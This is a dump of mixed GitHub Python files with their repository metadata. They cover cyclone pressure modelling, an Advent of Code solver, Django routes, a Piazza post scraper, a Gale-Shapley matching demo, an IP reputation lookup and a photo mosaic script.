transform=ax2.transAxes)\nax3.text(0.1, 0.1, \"Observed\", color=red, transform=ax3.transAxes)\nax3.text(0.1, 0.05, \"Model\", color=blue, transform=ax3.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2jday), transform=ax3.transAxes)\n\nax0.set_ylabel(r\"$P_{oci}$ (hPa)\")\nax0.set_xlabel(r\"$P_{ltm}$ (hPa)\")\nax1.set_xlabel(r\"$P_{centre}$ (hPa)\")\nax2.set_ylabel(r\"$P_{oci}$ (hPa)\")\nax2.set_xlabel(\"Latitude\")\nax3.set_xlabel(\"Day of year\")\nax3.set_xlim((0, 365))\nax0.grid(True)\nax1.grid(True)\nax2.grid(True)\nax3.grid(True)\n\nax0.text(0.1, 0.9, \"(a)\", ha='center', va='center', transform=ax0.transAxes)\nax1.text(0.1, 0.9, \"(b)\", ha='center', va='center', transform=ax1.transAxes)\nax2.text(0.1, 0.9, \"(c)\", ha='center', va='center', transform=ax2.transAxes)\nax3.text(0.1, 0.9, \"(d)\", ha='center', va='center', transform=ax3.transAxes)\nfig.tight_layout()\n\ndef getPoci(penv, pcentre, lat, jdays, eps,\n coeffs=[2324.1564738613392, -0.6539853183796136,\n -1.3984456535888878, 0.00074072928008818927,\n 0.0044469231429346088, -1.4337623534206905]):\n \"\"\"\n Calculate a modified pressure for the outermost closed isobar, based\n on a model of daily long-term mean SLP values, central pressure,\n latitude and day of year.\n\n :param penv: environmental pressure estimate (from long term mean pressure\n dataset, hPa).\n :param pcentre: Central pressure of storm (hPa).\n :param lat: Latitude of storm (degrees).\n :param jdays: Julian day (day of year).\n :param eps: random variate. Retained as a constant for a single storm.\n\n :returns: Revised estimate for the pressure of outermost closed isobar.\n \"\"\"\n\n if len(coeffs) < 6:\n LOG.warn(\"Insufficient coefficients for poci calculation\")\n LOG.warn(\"Using default values\")\n coeffs=[2324.1564738613392, -0.6539853183796136,\n -1.3984456535888878, 0.00074072928008818927,\n 0.0044469231429346088, -1.4337623534206905]\n\n if isinstance(penv, (np.ndarray, list)) and isinstance(pcentre, (np.ndarray, list)) and isinstance(lat, (np.ndarray, list)) and isinstance(jdays, (np.ndarray, list)):\n assert len(penv) == len(pcentre)\n assert len(penv) == len(lat)\n assert len(penv) == len(jdays)\n \n poci_model = coeffs[0] + coeffs[1]*penv + coeffs[2]*pcentre + coeffs[3]*pcentre*pcentre + coeffs[4]*lat*lat + coeffs[5]*np.sin(np.pi*2*jdays/365) + eps\n\n nvidx = np.where(pcentre == sys.maxint)\n poci_model[nvidx] = sys.maxint\n return poci_model\n \nimport sys\ntest_pcentre = np.array([920, 920, sys.maxint, 920, 1010])\ntest_penv = np.array([1000, 1000, 1000, 1000, 1000])\ntest_lat = np.array([-10, -9, -8, -7, -7])\ntest_jday = np.array([311,312,313,314, 314])\neps = np.random.normal(0,scale=2.5717)\n\npp = getPoci(test_penv, test_pcentre, test_lat, test_jday, eps)\nprint(pp)\n\n\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Validating environmental pressure values.py","file_name":"Validating environmental pressure values.py","file_ext":"py","file_size_in_byte":14393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23201708193","text":"#!/usr/bin/env python3.11\n\nfrom aochelper import *\nfrom z3 import If, Ints, Solver, sat\n\ndef solve(p2=4000000, p1=2000000):\n S = set()\n B = set()\n x, y = Ints('x y')\n s = Solver()\n s.add(0 <= x)\n s.add(x <= p2)\n s.add(0 <= y)\n s.add(y <= p2)\n Zabs = lambda x: If(x < 0, -x, x)\n for line in open('15.txt').read().splitlines():\n sx, sy, bx, by = ints(line)\n dist = abs(sx - bx) + abs(sy - by)\n lim = dist - abs(sy - p1)\n if by == p1:\n B.add(bx)\n for sensor in range(sx - lim, sx + lim + 1):\n S.add(sensor)\n s.add(Zabs(x - sx) + Zabs(y - sy) > dist)\n\n assert s.check() == sat\n m = s.model()\n return len(S-B), m[x].as_long() * p2 + m[y].as_long()\n\nprint(*solve())\n","repo_name":"llyyr/aoc-2022","sub_path":"15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22640337569","text":"# this is a code letting me play with python\r\n\r\n# Assignment and math\r\na = 0\r\nb = 2\r\nc = a + b\r\nprint(c)\r\n\r\n\r\n# if else\r\na = 20\r\nif a >= 22:\r\n print(\"if\")\r\nelif a >= 21:\r\n print(\"elif\")\r\nelse:\r\n print(\"else\")\r\n\t\r\n#Function\t\r\ndef someFunction(a,b):\r\n\tc = a + b\r\n\tprint(c)\r\nsomeFunction(a,b)\r\n\r\n# For Loop\r\nfor i in range(1,3):\r\n\tprint(i)\r\n\r\n#While Loop\t\r\na = 1\r\nwhile a < 10:\r\n\tprint(a)\r\n\ta+=1\r\n\r\n# Strings\t\r\nmyString = \"b;alfkjdbxdklsjfwiojx\"\r\nprint(type(myString))\r\nnum = myString.count('x')\r\nprint(num)\r\nprint(myString[2:3])\r\n\r\n#lists\r\n# list = [1,2,3,4]\r\n# print(list[1])\r\n\r\n# for i in list:\r\n\t# print(i)\r\n\t\r\n# list.reverse()\r\n# print(list)\r\n\r\n#tuples\r\nmyTuple = (1,2,3)\r\nmyList = list(myTuple)\r\nmyList.append(4)\r\nprint (myList)\r\n\r\n# dictionaries\r\n\r\nmyExample = {'something': 2, 'someElse': 20}\r\nprint(myExample['someElse'])\r\nmyExample['newItem'] = 400\r\nfor i in myExample:\r\n\tprint(myExample[i])\r\n\r\n# formatting\r\nprint('The total is %f' % 123.435)\r\nprint('The total is %.2f' % 123.435)\r\nmstring = \"a;sldjfie;wajf;efj\"\r\nprint('%s' % mstring)\r\n\r\n# try/except\r\nvar1 = '1'\r\ntry:\r\n\tvar2 = var1 + 1 #wont work\r\nexcept: \r\n\tvar2 = int(var1) + 1\r\nprint(var2)\r\n\r\n\r\n# classes\r\nclass Calculator(object):\r\n\tdef __init__ (self):\r\n\t\tself.current = 0\r\n\tdef add(self, amount):\r\n\t\tself.current += amount\r\n\tdef getCurrent(self):\r\n\t\treturn self.current\r\n\t\t\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jaschrass/Playing-with-Python","sub_path":"trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1027901096","text":"# src/main/base/urls.py\n# Django modules\nfrom django.urls import path\nfrom .views import TaskDetail, Tasks, CreateTask, EditTask, DeleteTask, Login, RegistrationPage\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n path('', Tasks.as_view(), name='tasks'),\n path('login/>', Login.as_view(), name='login'),\n path('register/>', RegistrationPage.as_view(), name='register'),\n path('logout/>', LogoutView.as_view(next_page='login'), name='logout'),\n path('task/', TaskDetail.as_view(), name='task'),\n path('create-task/', CreateTask.as_view(), name='create-task'),\n path('edit-task/', EditTask.as_view(), name='edit-task'),\n path('delete-task/', DeleteTask.as_view(), name='delete-task'),\n]\n","repo_name":"JasoSalgado/python-projects","sub_path":"task-manager/src/main/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26520350527","text":"import json\nimport os\nimport time\nimport random\n\ntry:\n from types import SimpleNamespace as Namespace\nexcept ImportError:\n # Python 2.x fallback\n pass #from types import SimpleNamespace\n\nfrom piazza_api.piazza import Piazza as pz\nfrom piazza_api.piazza import PiazzaRPC as rpc\n\nclass Piazza(object):\n def __init__(self, network, creds):\n self.nid = network\n self.creds = creds\n self.rpc = rpc(self.nid)\n self.rpc.user_login(self.creds['email'], self.creds['pwd'])\n self.course = pz(self.rpc)\n self.network = self.course.network(self.nid)\n\n def get_user_profile(self):\n prof = self.course.get_user_profile()\n return prof\n\n def get_user_profiles(self):\n users = self.rpc.get_all_users()\n profs = self.rpc.get_users(users)\n return profs\n\n def get_stats(self):\n data = self.rpc.get_stats(self.nid)\n return data\n\n def iter_all_posts(self):\n it = self.network.iter_all_posts(limit=10)\n return it\n\n def get_post(self, cid):\n p = self.network.get_post(cid)\n return p\n\n def get_all(self, out):\n it = self.network.iter_all_posts()\n c = 0\n\n if not os.path.exists(out):\n os.mkdir(out)\n\n for post in it:\n fname = os.path.join(out, 'cid_{}.json'.format(c))\n with open(fname, 'w') as d:\n json.dump(post, d, indent=4, sort_keys=True)\n c += 1\n time.sleep(2 + random.uniform(1.1, 5.1))","repo_name":"corytodd/rendezvous","sub_path":"tools/hacking/piazza.py","file_name":"piazza.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"7147341592","text":"import random # Using random module for choosing random free man from the list free_man\nfrom typing import Dict, List # Using typing module to define values of the dictionary\n\n\ndef gs_algorithm(preferences_men, preferences_women):\n print(\"\\nGale-Shapley algorithm.\")\n matching: Dict[str, str] = {} # Matching S_S is an empty dictionary\n\n # All men and women are free: fact that women are free ain't relevant,\n # fact that no man hadn't propose any woman is relevant\n free_men: List[str] = []\n proposals: Dict[str, int] = {}\n for man in preferences_men.keys():\n free_men.append(man)\n proposals[man] = 0 # Index of the first woman to propose, will increase during the execution of while loop\n\n first_man = list(preferences_men.keys())[0]\n out_of_range_index = len(preferences_men[first_man])\n print(f\"Out of range index of woman to propose for men: {out_of_range_index}\")\n iterations_counter = 1 # Not necessary, useful for tracking actions in each iteration of while loop\n not_propose_to_all_women = all(proposals[man] < out_of_range_index for man in free_men)\n print(\"\\nExecution of the while loop:\")\n while free_men and not_propose_to_all_women:\n print(f\"Iteration number {iterations_counter}:\")\n potential_fiance = random.choice(free_men) # Randomly chosen free man\n woman_index = proposals[potential_fiance] # Index of woman to propose in this iteration\n proposals[potential_fiance] += 1 # Index of woman to propose in next iteration for man\n potential_fiance_preferences = preferences_men[potential_fiance]\n print(f\"Randomly chosen free man is {potential_fiance}, \"\n f\"his list of preferences: {potential_fiance_preferences}.\")\n woman_to_propose = potential_fiance_preferences[woman_index]\n print(f\"Man {potential_fiance} is proposing woman {woman_to_propose} from index {woman_index}:\")\n\n if woman_to_propose not in matching.values(): # Checking if woman is single\n matching[potential_fiance] = woman_to_propose\n print(f\"\\tThis is first proposal to woman {woman_to_propose}.\")\n print(f\"\\tAdding couple ({potential_fiance}, {woman_to_propose}) to a matching.\")\n print(f\"\\tMatching after the update: \\n\\t{matching}.\")\n free_men.remove(potential_fiance)\n else: # Woman ain't single; fetching current fiance\n current_fiance = list(matching.keys())[list(matching.values()).index(woman_to_propose)]\n print(f\"\\tWoman {woman_to_propose} is in the matching with a fiance {current_fiance}:\")\n woman_to_propose_pref = preferences_women[woman_to_propose]\n print(f\"\\tWoman {woman_to_propose}'s preferences: {woman_to_propose_pref}.\")\n\n # Attention: index of lists; using < not >;\n # first in the list (index is 0) is the most preferred\n current_fiance_index = woman_to_propose_pref.index(current_fiance)\n potential_fiance_index = woman_to_propose_pref.index(potential_fiance)\n\n if current_fiance_index < potential_fiance_index:\n print(f\"\\tWoman {woman_to_propose} prefers current fiance {current_fiance} \"\n f\"more than potential fiance {potential_fiance}.\")\n print(f\"\\tMatching doesn't change in this iteration.\")\n else:\n print(f\"\\tWoman {woman_to_propose} prefers potential fiance {potential_fiance} \"\n f\"more than current fiance {current_fiance}.\")\n print(f\"\\tCurrent matching: \\n\\t{matching}.\")\n matching.pop(current_fiance) # Pop couple (current_fiance, woman_to_propose)\n print(f\"\\tRemoving couple ({current_fiance}, {woman_to_propose}) from the matching.\")\n matching[potential_fiance] = woman_to_propose\n print(f\"\\tAdding couple ({potential_fiance}, {woman_to_propose}) to matching.\")\n print(f\"\\tMatching after the update: \\n\\t\\t{matching}.\")\n free_men.remove(potential_fiance) # Potential fiance ain't free anymore\n print(f\"\\tMan {potential_fiance} is not free anymore.\")\n free_men.append(current_fiance) # Current fiance is free now\n print(f\"\\tMan {current_fiance} is free now.\")\n\n if free_men:\n print(f\"Free men are: {free_men}.\")\n else:\n print(\"There are no free men anymore.\")\n\n iterations_counter += 1\n not_propose_to_all_women = all(proposals[men] < out_of_range_index for men in free_men)\n print(\"\\t\")\n\n print(\"The result of Gale-Shapley algorithm is stable matching S: \\n{}\".format(matching))\n print(\"Sorted stable matching:\")\n for i in sorted(matching.keys()):\n print(f\"\\t({i}, {matching[i]})\")\n print(\"End of Gale-Shapley algorithm.\")\n return matching\n\n\n# Input data: men, women and their preferences;\n# structure: dictionary (unordered and changeable)\n\n# Stable matching problem from the thesis, Example 2.2.8.\n# Output stored in gs_example_1.txt\nmen_first: Dict[str, List[str]] = {\n 'm1': ['w1', 'w3', 'w2', 'w4'],\n 'm2': ['w3', 'w4', 'w1', 'w2'],\n 'm3': ['w4', 'w2', 'w3', 'w1'],\n 'm4': ['w4', 'w2', 'w1', 'w3']\n}\n\nwomen_first: Dict[str, List[str]] = {\n 'w1': ['m2', 'm4', 'm3', 'm1'],\n 'w2': ['m4', 'm3', 'm1', 'm2'],\n 'w3': ['m1', 'm4', 'm2', 'm3'],\n 'w4': ['m4', 'm1', 'm2', 'm3']\n}\n\n# gs_algorithm(men_first, women_first)\n\n\n# Stable matching problem from the article The Stable Matching Problem, D.G. McVitie and L.B. Wilson\n# Reference [6] in the thesis\n# Output stored in gs_example_2.txt\nmen_second: Dict[str, List[str]] = {\n 'm1': ['w5', 'w7', 'w1', 'w2', 'w6', 'w8', 'w4', 'w3'],\n 'm2': ['w2', 'w3', 'w7', 'w5', 'w4', 'w1', 'w8', 'w6'],\n 'm3': ['w8', 'w5', 'w1', 'w4', 'w6', 'w2', 'w3', 'w7'],\n 'm4': ['w3', 'w2', 'w7', 'w4', 'w1', 'w6', 'w8', 'w5'],\n 'm5': ['w7', 'w2', 'w5', 'w1', 'w3', 'w6', 'w8', 'w4'],\n 'm6': ['w1', 'w6', 'w7', 'w5', 'w8', 'w4', 'w2', 'w3'],\n 'm7': ['w2', 'w5', 'w7', 'w6', 'w3', 'w4', 'w8', 'w1'],\n 'm8': ['w3', 'w8', 'w4', 'w5', 'w7', 'w2', 'w6', 'w1']\n}\n\nwomen_second: Dict[str, List[str]] = {\n 'w1': ['m5', 'm3', 'm7', 'm6', 'm1', 'm2', 'm8', 'm4'],\n 'w2': ['m8', 'm6', 'm3', 'm5', 'm7', 'm2', 'm1', 'm4'],\n 'w3': ['m1', 'm5', 'm6', 'm2', 'm4', 'm8', 'm7', 'm3'],\n 'w4': ['m8', 'm7', 'm3', 'm2', 'm4', 'm1', 'm5', 'm6'],\n 'w5': ['m6', 'm4', 'm7', 'm3', 'm8', 'm1', 'm2', 'm5'],\n 'w6': ['m2', 'm8', 'm5', 'm4', 'm6', 'm3', 'm7', 'm1'],\n 'w7': ['m7', 'm5', 'm2', 'm1', 'm8', 'm6', 'm4', 'm3'],\n 'w8': ['m7', 'm4', 'm1', 'm5', 'm2', 'm3', 'm6', 'm8']\n}\n\n# gs_algorithm(men_second, women_second)\n","repo_name":"KristinaUdovicic/master_thesis","sub_path":"algorithm_detailed/gale_shapley_algorithm.py","file_name":"gale_shapley_algorithm.py","file_ext":"py","file_size_in_byte":6871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32715296624","text":"import requests\nimport json\n\ndef getIPrepdata(ip):\n apiiplist = \"https://otx.alienvault.com/api/v1/indicator/IPv4/\" + str(ip) + \"/reputation\"\n iplist = requests.get(apiiplist)\n ipdata = iplist.json()\n return ipdata\n\ndef dedupeList(x):\n return list(dict.fromkeys(x))\n\ndef getinput():\n ip = '184.168.221.57'\n x = input(\"What IP do you want to research?\\nIP \" + ip + \" will be used if left blank.\\n->\")\n if x != '':\n ip = str(x)\n return(ip)\n\ndef run():\n ip = getinput()\n global ipresult\n ipresult = getIPrepdata(ip) \n list = getIPrep(ip)\n returnList(list)\n\ndef returnList(items):\n for i in items:\n print(i)\n\ndef getIPrep(ip):\n lines = []\n dedupe = []\n if ipresult[\"reputation\"]:\n for records in (ipresult[\"reputation\"][\"activities\"]):\n name = records[\"name\"]\n fd = records.get(\"first_date\")\n ld = records.get(\"last_date\")\n record = ip + \" known for \" + name\n lines.append(record)\n else:\n lines.append(\"IP has no reputation data for bad activity.\")\n for x in lines:\n if x not in dedupe:\n dedupe.append(x)\n return dedupe\n\n\n\nrun()\n","repo_name":"kkasberg/OTXIPLookup","sub_path":"lookupIP.py","file_name":"lookupIP.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20463000363","text":"def sumnum(num1, num2, k):\n sum = 0\n for i in range(num1, num2+1):\n sum = sum + i**k\n return sum\n \ndef mainsum():\n a = 50\n b = 150\n k = 2\n print(\"Sum of %d power of numbers from %d to %d = %d\" % (k,a,b, sumnum(a,b,k)))\n\n\nmainsum()\n\n","repo_name":"JacklineKigombe/Jenga-School-Lecture-11-assignment","sub_path":"Lecture11_assgn3.py","file_name":"Lecture11_assgn3.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28378973587","text":"import flywithwings\r\nimport nowings\r\nimport quack\r\nimport noquack\r\nimport squeak\r\n\r\nobj1 = flywithwings.flywithwings\r\nobj2 = nowings.nowings\r\nobj3 = quack.quack\r\nobj4 = noquack.noquack\r\nobj5 = squeak.squeak\r\n\r\nval = \" \"\r\nprint(\"select a duck\")\r\nprint(\"for Mallard Duck write 1\")\r\nprint(\"for Rubber Duck write 2\")\r\nprint(\"for Redhead Duck write 3\") \r\nprint(\"for Decoy Duck write 4\")\r\nval = input(\"number -\")\r\nif val == \"1\":\r\n print(\"This is a Mallard Duck.\")\r\n obj1.flywithwings()\r\n obj3.quack()\r\nelif val == \"2\":\r\n print(\"This is a Rubber Duck.\")\r\n obj2.nowings()\r\n obj5.squeak()\r\nelif val == \"3\":\r\n print(\"This is a Readhead Duck.\")\r\n obj1.flywithwings()\r\n obj4.noquack()\r\nelif val == \"4\":\r\n print(\"This is a Decoy Duck.\")\r\n obj1.flywithwings()\r\n obj3.quack()","repo_name":"ayushsharma1211/Lab_11_-e22mcag0012-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29559800357","text":"get_ipython().magic('load_ext autoreload')\nget_ipython().magic('autoreload 2')\n\nimport os; os.chdir('..')\nimport models\nimport orca\nfrom urbansim.maps import dframe_explorer\n\n# Run some model steps\norca.run([\n \"neighborhood_vars\",\n \"rsh_simulate\",\n \"rrh_simulate\", \n], iter_vars=[2010])\n\nd = {tbl: orca.get_table(tbl).to_frame() for tbl in \n ['buildings', 'residential_units', 'households']}\n\ndframe_explorer.start(d, \n center=[37.7792, -122.2191],\n zoom=11,\n shape_json='data/zones.json',\n geom_name='ZONE_ID', # from JSON file\n join_name='zone_id', # from data frames\n precision=2)\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/exploration.py","file_name":"exploration.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34794080210","text":"def ePrimo(num):\r\n div,count=2,0\r\n\r\n while div<=num/2 and count==0:\r\n if num%div==0:\r\n count+=1\r\n else:\r\n div+=1\r\n if count==0:\r\n return True \r\n else:\r\n return False\r\n\r\ntesto=open(\"./testo.txt\",\"w\")\r\nnum,nNumPrimi=2,0\r\nwhile(nNumPrimi <=100):\r\n if((ePrimo(num))):\r\n testo.write(str(num) +\"\\n\")\r\n nNumPrimi+=1\r\n num+=1","repo_name":"MicheleMolineri/4A_ROB_Sistemi_E_Reti-","sub_path":"Pitone/EsPitone/es033(numeriPrimiFile).py","file_name":"es033(numeriPrimiFile).py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"75193654189","text":"from kpi_app.models import KpiDevice, KpiMessage, KpiMessageEquationResult, KpiInformation\nfrom rest_framework import serializers\n\n\nclass KpiDeviceSerializer(serializers.ModelSerializer):\n class Meta:\n model = KpiDevice\n fields = ['asset_id', 'kpi_id']\n\n\nclass KpiInformationSerializer(serializers.ModelSerializer):\n assets = serializers.SlugRelatedField(many=True, read_only=True, slug_field='asset_id')\n\n class Meta:\n model = KpiInformation\n fields = \"__all__\"\n\n\nclass KpiMessageEquationResultSerilizer(serializers.ModelSerializer):\n class Meta:\n model = KpiMessageEquationResult\n fields = ['value', 'kpi_equation']\n\n\nclass KpiMessageSerilizer(serializers.ModelSerializer):\n # assets = serializers.SlugRelatedField(many=True, read_only=True, slug_field='asset_id')\n # message_result = KpiMessageEquationResultSerilizer(many=True, read_only=True)\n\n class Meta:\n model = KpiMessage\n fields = ['asset_id', 'attribute_id', 'timestamp']\n","repo_name":"mahmoudmostafa0/HeadwayProgram","sub_path":"djangotask/kpi_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"11952903003","text":"import json\nimport logging\n\nfrom luigi import configuration\n\nfrom ..util.validation import validate_file, validate_dir\nfrom ..spawners import SingleInputFileSpawner\nfrom ..tasks import SimulationTask\nfrom ..simulation_inputs import JsonSimulationInput\n\n\ndef create_spawner(task_exe, working_dir, base_file, runner_type):\n \"\"\"\n Creates spawner that creates tasks taking a single JSON input file as command line argument\n\n :param task_exe: Path of executable to run. If None, input files will be written but no tasks run\n :param working_dir: Working directory of task execution\n :param base_file: Baseline JSON file on which to make parameter editions and additions. If None, parameter additions\n will be made onto an empty input\n :return: :class:`SingleInputFileSpawner` object\n \"\"\"\n if task_exe is not None:\n validate_file(task_exe, 'task_exe')\n if working_dir is not None:\n validate_dir(working_dir, 'working_dir')\n if base_file is not None:\n validate_file(base_file, 'base_file')\n\n if task_exe is None:\n task_exe = ''\n if working_dir is None:\n working_dir = '.'\n\n logger = logging.getLogger(__name__)\n logger.info(\"Creating Single input file spawner with JSON input\")\n logger.info(\"task_exe = %s\", task_exe)\n logger.info(\"working_dir = %s\", working_dir)\n logger.info(\"base_file = %s\", base_file)\n logger.info(\"runner_type = %s\", runner_type)\n\n luigi_config = configuration.get_config()\n luigi_config.set(SimulationTask.__name__, '_exe_path', task_exe)\n luigi_config.set(SimulationTask.__name__, '_working_dir', working_dir)\n luigi_config.set(SimulationTask.__name__, '_runner_type', runner_type)\n\n if base_file is not None:\n with open(base_file, 'r') as fp:\n params = json.load(fp)\n else:\n params = {}\n sim_input = JsonSimulationInput(params, indent=2)\n return SingleInputFileSpawner(sim_input, 'input.json')\n","repo_name":"BitBloomTech/spawn","sub_path":"spawn/plugins/json_input_file.py","file_name":"json_input_file.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"34875775570","text":"from node import Node\n\nclass TreeCompressed:\n def __init__(self):\n self.head = None\n\n def pushNode(self, elem):\n if self.head:\n pointer = self.head\n while (pointer.next):\n pointer = pointer.next\n pointer.next = Node(elem)\n else:\n self.head = Node(elem)\n \n def printNode():\n print(head)\n \nif __name__ == \"__main__\":\n TreeCompressed()\n ","repo_name":"imkimura/linkedtree","sub_path":"treeBinary/treeCompress.py","file_name":"treeCompress.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12228025293","text":"class Player:\n def __init__(self, p):\n self.name = p[\"name\"]\n self.age = p[\"age\"]\n self.position = p[\"position\"]\n self.team = p[\"team\"]\n\nplayers = [\n {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n },\n {\n \t\"name\": \"Kyrie Irving\", \n \t\"age\":32, \"position\": \"Point Guard\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Damian Lillard\", \n \t\"age\":33, \"position\": \"Point Guard\", \n \t\"team\": \"Portland Trailblazers\"\n },\n {\n \t\"name\": \"Joel Embiid\", \n \t\"age\":32, \"position\": \"Power Foward\", \n \t\"team\": \"Philidelphia 76ers\"\n },\n {\n \t\"name\": \"\", \n \t\"age\":16, \n \t\"position\": \"P\", \n \t\"team\": \"en\"\n }\n]\n\nKevin_Durant=Player(players[0])\nprint(Kevin_Durant.age)","repo_name":"Ethanhe213/Python-Dojo","sub_path":"fundamentals/extras/Challenge1.py","file_name":"Challenge1.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18103741336","text":"#Exercise 4: Add code to the above program to figure out who has the most \n# messages in the file. After all the data has been read and the dictionary \n# has been created, look through the dictionary using a maximum loop \n# (see Chapter 5: Maximum and minimum loops) to find who has the most \n# messages and print how many messages the person has.\n\n\"\"\"\n# Enter a file name: mbox-short.txt\n# cwen@iupui.edu 5\n# Enter a file name: mbox.txt\n# zqian@umich.edu 195\n\"\"\"\n\n\npath = \"/home/tbfk/Documents/VSC/Coursera/PythonDataStructures/\"\ncount = dict()\nfname = path + \"mbox.txt\" #input(\"Enter a file name: \")\nmax_count = None\nperson = None\n\ntry:\n fhandle = open(fname)\nexcept:\n print(\"File %s cannot be found\" %fname)\n exit()\n\nfor line in fhandle:\n line = line.rstrip()\n #print(line)\n if not line.startswith(\"From \"):\n continue\n else:\n words = line.split()\n #print(words)\n mailadress = words[1]\n count[mailadress] = count.get(mailadress,0) + 1\n\nfor key, val in count.items():\n if (max_count is None) or val > max_count:\n max_count = val\n person = key \n\nprint(person, max_count)\n\n","repo_name":"bounty030/Coursera","sub_path":"Python_for_Everybody_Specialization_UMich/PythonDataStructures/week5_chapter9_ex4.py","file_name":"week5_chapter9_ex4.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"4622386695","text":"from PIL import Image\nimport glob\nfrom datetime import datetime\n#doc pillow : https://pillow.readthedocs.io/en/stable/reference/Image.html\n\nObjectif=Image.open(\"Objectif.jpg\")\npngdict={}\nNB_LIGNES=15\nNB_COLONNES=15\nLARGEUR_PHOTOS=Objectif.width//NB_COLONNES\nHAUTEUR_PHOTOS=Objectif.height//NB_LIGNES\n\n\n\n#le pixel gardé est le pixel le plus courant dans l'image\ndef moyennepixels(image,largeur=LARGEUR_PHOTOS,hauteur=HAUTEUR_PHOTOS):\n\tcurrentmax=(0,0)\n\tcouleurs={}\n\tfor x in range(largeur):\n\t\tfor y in range(hauteur):\n\t\t\trvb=image.getpixel((x,y))\n\t\t\tif rvb in couleurs.keys():\n\t\t\t\tcouleurs[rvb]+=1\n\t\t\t\tif couleurs[rvb]>currentmax[1]:\n\t\t\t\t\tcurrentmax=(rvb,couleurs[rvb])\n\t\t\telse:\n\t\t\t\tcouleurs[rvb]=0\n\treturn currentmax[0]\n\n#moyenne pondérée pour chaque composante rgb\ndef moyennepixels_ponderee(image,largeur=LARGEUR_PHOTOS,hauteur=HAUTEUR_PHOTOS):\n\tred={}\n\tgreen={}\n\tblue={}\n\tfor x in range(largeur):\n\t\tfor y in range(hauteur):\n\t\t\trvb=image.getpixel((x,y))\n\t\t\tif rvb[0] in red.keys():\n\t\t\t\tred[rvb[0]]+=1\n\t\t\telse:\n\t\t\t\tred[rvb[0]]=1\n\t\t\tif rvb[1] in green.keys():\n\t\t\t\tgreen[rvb[1]]+=1\n\t\t\telse:\n\t\t\t\tgreen[rvb[1]]=1\n\t\t\tif rvb[2] in blue.keys():\n\t\t\t\tblue[rvb[2]]+=1\n\t\t\telse:\n\t\t\t\tblue[rvb[2]]=1\n\trouge_num=0\n\tfor i in red.keys():\n\t\trouge_num+=i*red[i]\n\trouge=int(rouge_num/sum(red.values()))\n\tvert_num=0\n\tfor i in green.keys():\n\t\tvert_num+=i*green[i]\n\tvert=int(vert_num/sum(green.values()))\n\tbleu_num=0\n\tfor i in blue.keys():\n\t\tbleu_num+=i*blue[i]\n\tbleu=int(bleu_num/sum(blue.values()))\n\treturn (rouge,vert,bleu)\n\n\ndef initialiseimages():\n\t#on met dans un dictionnaire tous les noms des images dont on déjà trouvé la couleur moyenne, avec cette couleur moyenne associée\n\ttry:\n\t\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"r\")\n\t\ttexte=photos_connues.read()\n\t\tphotos_connues.close()\n\t\tseparation=texte.split(\"|\")\n\t\tseparation.pop()\n\t\tmoyenne_pixels_photo={}\n\t\tfor i in range(0,len(separation),2):\n\t\t\tmoyenne_pixels_photo[separation[i]]=separation[i+1]\n\texcept:\n\t\tmoyenne_pixels_photo={}\n\n\n\tall_images=glob.glob('Images/*')\n\tfor filename in all_images: #pour toutes les images du dossier source\n\t\t#print(filename)\n\t\tif filename in moyenne_pixels_photo.keys():#si elles ne sont pas déjà dans la liste susmentionnée\n\t\t\tcontinue\n\t\tphoto = Image.open(filename)\n\t\tphoto=photo.resize((700,500))#on les ouvre et on leur done une résolution plus basse (car photos souvent 5000x3000)\n\t\tpngdict[filename] = photo 